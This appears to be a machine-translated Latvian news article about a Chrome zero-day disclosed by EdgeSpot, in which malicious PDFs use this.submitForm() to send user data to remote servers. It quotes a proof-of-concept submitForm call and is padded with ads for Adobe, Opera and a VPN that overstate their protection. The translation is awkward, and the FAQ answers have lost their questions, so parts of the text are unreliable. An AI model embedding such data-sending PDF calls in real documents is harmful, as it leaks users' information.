- EdgeSpot atklāja intriģējošu nulles dienas ievainojamību, kas pārlūkā Chrome izmanto PDF dokumentus.
- Šis ievainojamība var jums kaitēt, ievācot sensitīvos datus datorā.
- Izpētiet mūsu Tīmekļa un mākoņa lapa lai iegūtu plašāku ieskatu par citiem rīkiem un pakalpojumiem.
- Ja jūs interesē pārlūkprogrammas, mūsu vietnē mēs sniedzam daudz informācijas par tām Pārlūkprogrammu centrs.
Padariet visus dokumentus pieejamus un drošus, izmantojot Adobe Acrobat Reader. Šis dokumentu pārvaldības rīks arī ļaus jums e-parakstīties un izveidot oficiālas veidlapas, lai ietaupītu jūsu laiku darbā. Iegūstiet to personālajam datoram, un jūs varēsiet:
- Atveriet, izdrukājiet un rediģējiet visus savus PDF un citus failu tipus
- Vieglāk aizpildiet PDF veidlapas
- Svarīgākos dokumentus glabājiet šifrētos
Iegūstiet visas lietotnes par īpašu cenu!
Pasaules dokumentu pārvaldības programmatūra Nr.1 tagad ir par izdevīgu cenu, tāpēc pasteidzieties!
Izmantošanas noteikšanas pakalpojums EdgeSpot atklāja intriģējošu Chrome nulles dienas ievainojamība, izmantojot PDF dokumentus.
Neaizsargātība ļauj uzbrucējiem ievākt sensitīvus datus izmantojot pārlūkā Chrome atvērtus ļaunprātīgus PDF dokumentus.
Tiklīdz cietušais pārlūkā Google Chrome atver attiecīgos PDF failus, fonā sāk darboties ļaunprātīga programma, vācot lietotāja datus.
Pēc tam dati tiek pārsūtīti uz attālo serveri, kuru kontrolē hakeri. Jums varētu būt jautājums, kādus datus uzbrucēji sūc, viņi jūsu datorā atlasa šādus datus:
- IP adrese
- Pilns PDF faila ceļš sistēmā
- OS un Chrome versijas
Sargieties no ļaunprātīgas programmatūras pārnēsātiem PDF failiem
Eksperti plankumains ka viens no diviem domēniem lasīt paziņot [.] com vai burpcollaborator [.] net saņēma datus.
Viņi atklāja, ka uzbrucēji izmanto this.submitForm () PDF Javascript API, lai apkopotu sensitīvu lietotāju informāciju.
Mēs to pārbaudījām ar minimālu PoC, vienkāršu API izsaukumu this.submitForm (’ http://google.com/test’) liks pārlūkam Google Chrome nosūtīt personas datus uz vietni google.com.
Šo Chrome kļūdu izmantoja divas atšķirīgas ļaunprātīgu PDF failu kopas, kuras abas tika izplatītas attiecīgi 2017. gada oktobrī un 2018. gada septembrī.
Konkrēti, uzbrucēji apkopotos datus var izmantot, lai precizētu uzbrukumus nākotnē. Pārskati liecina, ka pirmā failu partija tika apkopota, izmantojot ReadNotify PDF izsekošanas pakalpojumu.
Lietotāji var izmantot pakalpojumu, lai sekotu lietotāju skatījumiem. EdgeSpot nav kopīgojis sīkāku informāciju par otrā PDF failu komplekta būtību.
Ātrs padoms: nomainiet pārlūkprogrammu uz Opera
Šajos nemierīgajos laikos mums katrā solī uzbrūk ar ļaunprātīgu programmatūru, pikšķerēšanu un Trojas zirgiem, tāpēc mums ir jābūt daudz modrākiem un jāpaliek aizsargātiem.
Tā kā šī ir Chrome specifiska problēma, jūs varat izvairīties no šiem draudiem un visiem citiem, izmantojot tādu drošības pārlūku kā Opera.
Šajā pārlūkprogrammā ir iebūvēts reklāmu bloķētājs, kas ne tikai notīra šādus traucējumus, bet arī bloķē analīzes skripti, izsekošanas pikseļi un datu vākšanas metodes.
Un, ja vēlaties būt pilnīgi pārliecināts, ka novēršaties no jebkādām briesmām, nokļūstiet aiz iebūvētā VPN pakalpojums, kuru var simtprocentīgi izmantot neierobežotu laiku.
Opera
Opera piedāvā perfektu aizsardzību pret draudiem, izmantojot iebūvēto reklāmu bloķētāju un VPN pakalpojumu bez maksas!
Apmeklējiet vietni
Kā es varu pasargāt no PDF ievainojamības?
Lejupielādējiet Adobe Acrobat PRO
Adobe un Chrome labi sader ar PDF failu apstrādi. Instalējot Adobe paplašinājumu pārlūkam Chrome, varat pārskatīt un manipulēt ar PDF failiem pēc savas gaumes, neatstājot iecienīto pārlūku.
Neskatoties uz robusto struktūru, PDF failos paslēpta ļaunprātīga programmatūra, iespējams, netiks atklāta, ja izmantojat Reader standarta versiju.
Profesionālā versija ir ieteicama, lai garantētu jūsu aizsardzību un atturētu jūsu datus no hakeriem.
Lai gan tā nav bezmaksas, cena, ko maksāsit, ir diezgan maza par daudzām papildu funkcijām, kas jums patiks, tostarp par uzlabotu jūsu PDF failu drošību.
Ir iekļauta arī 7 dienu bezmaksas izmēģinājuma versija, lai pirms pirkuma veikšanas jūs varētu nobaudīt pilnu Pro pieredzi.
Adobe Acrobat PRO
Turieties tālāk no ļaunprātīgas programmatūras, lejupielādējot Adobe Acrobat PRO. Tam ir daudz vairāk funkciju nekā bezmaksas versijai, un tas nodrošina jūsu datu drošību.
Apmeklējiet vietni
Gadījumā, ja sērfojot internetā vēlaties būt drošs, jums būs jāiegūst pilnībā izveidots rīks tīkla aizsardzībai. Instalējiet privāto piekļuvi internetam tūlīt un nodrošiniet sevi. Tas aizsargā datoru no uzbrukumiem pārlūkošanas laikā, maskē jūsu IP adresi un bloķē visu nevēlamo piekļuvi.
Exploit noteikšanas pakalpojums EdgeSpot vēlējās brīdināt Chrome lietotājus par iespējamiem riskiem, jo nebija paredzēts, ka plāksteris tiks izlaists tuvākajā nākotnē.
EdgeSpot ziņoja Google par ievainojamību pagājušajā gadā, un uzņēmums solīja atbrīvot plāksteri aprīļa beigās.
Tomēr varat apsvērt iespēju izmantot pagaidu problēmu, lokāli apskatot saņemtos PDF dokumentus, izmantojot citu lasītāja lietotni.
Varat arī atvērt PDF dokumentus pārlūkā Chrome, atvienojot sistēmas no interneta.
bieži uzdotie jautājumi
Jā, tā arī notiek. Bet, ja vēlaties plašāku izvēli, izpētiet mūsu populārākās izvēles iespējas Chromeprivātumu paplašinājumi šo pilnīgo ceļvedi.
Tšeit ir daudz paplašinājumu, kas ļauj PDF faili apstrāde. Pārbaudiet no mūsu lielisks ceļvedis par labākajiem Chrome paplašinājumiem PDF.
Tā nav, bet jūs varat to ātri aktivizēt. Lūk, mūsu visaptveroša rokasgrāmata par to, kā iespējot QR koda ģeneratoru pārlūkā Chrome.
